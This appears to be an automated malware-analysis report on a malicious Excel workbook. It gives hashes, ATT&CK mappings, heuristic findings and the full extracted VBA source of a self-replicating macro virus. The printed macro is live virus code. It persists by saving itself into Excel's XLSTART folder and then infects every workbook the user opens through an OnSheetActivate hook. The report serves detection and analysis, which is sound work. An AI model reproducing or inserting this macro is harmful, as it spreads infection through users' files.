Office (OOXML) / .XLSX malware analysis — malicious · 89c3a8c6791b19b6

MALICIOUS

Office (OOXML) / .XLSX

164.1 KB Created: 2024-07-02 02:19:41 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-27

MD5: 390a5a4a3a65561718b494958944a289 SHA-1: 53826e9e89b56c59484ee7a26e9010c837671b1c SHA-256: 89c3a8c6791b19b6d558290d950aeee99481b04c468d4a78e9aa8d5d806b599a

126 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1071.001 Web Protocols

The sample contains VBA macros, including an Auto_Open subroutine, which is a common technique for malicious macro execution. The script copies itself to the Excel startup folder, establishing persistence. It also attempts to infect other workbooks by copying itself into them via an OnSheetActivate hook, indicating a spreading mechanism.

Heuristics 7

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
    ChDir Application.StartupPath
```
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER

The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
Matched line in script
```
    Application.OnSheetActivate = "check_files"
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```
External hyperlinks (14) low OOXML_EXTERNAL_HYPERLINKS

Document contains 14 external hyperlinks — clickable URLs are stored as external relationships. First target: ../3.TROUBLE NOTE/GHI CHÉP SỰ CỐ ( (LR・組立）.xlsx
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/2000/svg Document hyperlink
- http://www.w3.org/1999/xlinkDocument hyperlink

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3007 bytes
SHA-256: `d06f39d184143cb0c8b0b8f949c31f2e3c6239f1bc9808f625dfef74688dd42a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Today_Click() o_f_a = Cells(30, 2) 'open file adress??????????????? o_f_n = Cells(31, 2) 'open file name???????????? Workbooks.Open FileName:=o_f_a & o_f_n End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Attribute VB_Name = "Module2" Sub Today() o_f_a = Cells(30, 2) 'open file adress??????????????? o_f_n = Cells(31, 2) 'open file name???????????? Workbooks.Open FileName:=o_f_a & o_f_n End Sub Attribute VB_Name = "foxz" 'donwload NEG!!! NoMercyExcelGenerator form NoMercyPage! 'foxz@usa.net Sub auto_open() Attribute auto_open.VB_Description = "\n\n \n\n\n�\n" Application.OnSheetActivate = "check_files" End Sub Sub check_files() Attribute check_files.VB_Description = "\n\n \n\n\n�\n" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "NEGS.XLS") If m$ = "NEGS.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name Sheets("foxz").Visible = True Sheets("foxz").Select Sheets("foxz").Copy With ActiveWorkbook .title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "infected by NEG Promo!" End With newname$ = ActiveWorkbook.Name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "NEGS.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("foxz").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "NEGS.XLS!check_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name If s$ <> "foxz" Then Workbooks("NEGS.XLS").Sheets("foxz").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("foxz").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "NEGS.XLS!check_files" Case Else End Select End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	22528 bytes
SHA-256: `44c90648e68f8c28b9722b7bb3b244b393e88e944165534d7da81fbccadf19ee`
`emf_00.emf`	ooxml-emf	OOXML EMF part: xl/media/image1.emf	2672 bytes
SHA-256: `ebff33035a2e5d49a440e772bb0124f6173161310960c8a90c6bcbbacfd266a1`

Open this report in the interactive analyzer, or submit your own file for analysis.